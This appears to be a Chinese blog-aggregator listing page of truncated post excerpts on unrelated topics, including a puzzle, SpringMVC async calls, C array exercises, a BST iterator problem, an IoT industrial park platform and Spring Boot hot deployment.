题目 输入样例&#xff1a; 4 7输出样例&#xff1a; 17 思路 一个字&#xff0c;猜。 一开始不知道怎么做的时候&#xff0c;想要暴力枚举对于特定的包装n, m&#xff0c;最大不能买到的数量maxValue是多少&#xff0c;然后观察性质做优化。那么怎么确定枚举结果是否正确呢…

主题乐园如何让新客变熟客,让游客变“留客”?

群硕跨越时间结识了一位爱讲故事的父亲&#xff0c;他汇集了一群幻想工程师&#xff0c;打算以故事为基础&#xff0c;建造一个梦幻的主题乐园。 这个乐园后来成为全球游客最多、收入最高的乐园之一&#xff0c;不仅在2023财年创下了近90亿&#xff08;美元&#xff09;的营收…

独家揭秘:AI大模型在实践中的应用!

在当今社会&#xff0c;人工智能技术被广泛应用于各行各业。其中&#xff0c;AI大模型作为人工智能领域的热门话题&#xff0c;正逐渐成为现实生活中的重要应用。AI大模型是一种基于深度学习和神经网络技术的计算机模型&#xff0c;能够通过大规模数据的训练和学习&#xff0c;…

SpringMVC-异步调用,拦截器与异常处理

1.异步调用 1.发送异步请求 <a href"javascript:void(0);" id"testAjax">访问controller</a> <script type"text/javascript" src"js/jquery-3.7.1.js"></script> <script type"text/javascript&qu…

C语言学习--练习2

目录 1.排序数组 2.多数元素 3.存在重复元素 4.最大间距 5.按奇偶排序数组 6.最小时间差 1.排序数组 /*** Note: The returned array must be malloced, assume caller calls free().*/ int cmp(const void*a,const void*b){return *(int*)a-*(int*)b; } int* sortArray(i…

C语言抽象代码(其五)

水博客 今天突发奇想&#xff0c;可不可以用中文写代码。 然后我发现可以用#define完成。 我们看代码 非常好理解就是用前面代替后面。比如&#xff1a; 主函数 代替 int main 非常简单

二叉搜索树题目:二叉搜索树迭代器

文章目录 题目标题和出处难度题目描述要求示例数据范围进阶 解法一思路和算法代码复杂度分析 解法二思路和算法代码复杂度分析 解法三思路和算法代码复杂度分析 题目 标题和出处 标题&#xff1a;二叉搜索树迭代器 出处&#xff1a;173. 二叉搜索树迭代器 难度 4 级 题目…

计讯物联智慧工业园区系统平台全面提升园区智能化水平

工业园区聚集着各种生产要素&#xff0c;是纺织、机械、家具等诸多产业集中的区域&#xff0c;更是资源消耗和污染物排放的集中地。根据某些工业园区环境调研&#xff0c;园区入驻企业从生产原料到生产制造过程大多带有有毒有害、易燃易爆的特性&#xff0c;再加上装置大型化、…

SpringBoot 热部署。

SpringBoot 热部署。 文章目录 SpringBoot 热部署。 pom.xml。 <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-devtools</artifactId><scope>runtime</scope><optional>true</optional…